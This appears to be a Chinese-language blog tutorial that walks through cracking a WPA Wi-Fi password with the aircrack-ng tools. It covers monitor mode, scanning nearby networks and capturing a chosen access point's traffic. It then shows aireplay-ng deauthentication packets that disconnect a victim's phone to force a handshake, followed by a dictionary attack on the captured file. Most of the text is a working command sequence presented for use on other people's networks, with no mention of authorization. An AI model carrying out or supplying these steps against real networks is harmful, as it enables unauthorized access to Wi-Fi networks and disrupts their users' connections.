1.关闭影响进程

 airmon-ng check kill 

 将要进入监听模式的无线网卡断开它已连接的AP

2.查看无线网卡的名字

 ifconfig ,例如 wlan0

3.进入监听模式：

 airmon-ng start wlan0 

　　启动成功， ifconfig 后发现多了一个mon0

4.扫描附件wifi

 airodump-ng mon0 

　　扫描后，终端显示为上下2个部分，按空格键可以启动/停止动态刷新， 'a'键可以调整显示视图，上下方向键可以选定一行方便查看。其中默认视图中，上半部分是扫描到的AP以及其属性，例如信号强度，通道，bssid,essid等，下半部分显示的是有哪些机器（对应于STATE栏，就是它mac）连接到这个AP（对应的就是ESSID）。

5.监听指定AP

　　执行下列命令要停止扫描，及停止步骤4的命令，因为扫描会不断切换channel，而监听某个AP时，这个AP的channel是固定的。

　　 airodump-ng --bssid AP‘s mac -c channel -w capfile mon0 

 　　--bssid：指定监听哪个AP（由AP’s mac指定）

　　-c :指定这个AP的通道

       -w:捕获的包存入文件capfile

　　注意选定AP：

　　　　1.步骤4下半部分的 BSSID和STATE要都存在一个mac,意思是探测到一个wifi的BSSID，并且这个wifi被一个或多个机器连接上（STATE栏指示其mac），步骤6解释为什么要这样选定。

6.强制重连，使握手包出现

　　 aireplay-ng -0 2 -a AP's bssid -c phone's mac mon0 

　　　　　　　　　|　|　　　　|　　　　　　|___连上这个wifi的手机的mac

　　　　　　　　　|　|　　　　|______________wifi的 BSSID

　　　　　　　　　|　|______________________攻击次数

　　　　　　　　　|_________________________攻击方法

　　攻击会导致手机和wifi断开连接。

 

　　1.为什么要抓握手包？

　　　　握手包里包含密码信息

　　2.握手过程：

　　　　假设是我的手机去连wifi，第一次肯定会要你输入密码。

　　　　　　手机：我要连接你wifi

　　　　　　wifi：你的密码

　　　　　　手机：这是我的密码

　　　　　　wifi:检查密码，正确，建立连接，错误，滚。

　　对于一个已经过密码验证的手机和wifi，它们建立连接后交换的数据只不过是一些上网数据，抓它们没用，要抓就要抓包含密码的握手包，怎么让一个已验证过密码的连接再次出现握手包？最快的方法就是把手机踢下线，然后手机会自动重连，或者用手机的人发现手机断网了，他就会去连一下，这时握手包就出现了。这也就是为什么要选定一个有机器连接上的wifi来监听。

　　不久就会在步骤5那个终端的第一行的末尾出现抓到握手包。若没出现，过几分钟重复攻击。

 

7.跑字典

　　aircrack-ng  capfile.cap -w passwd.lst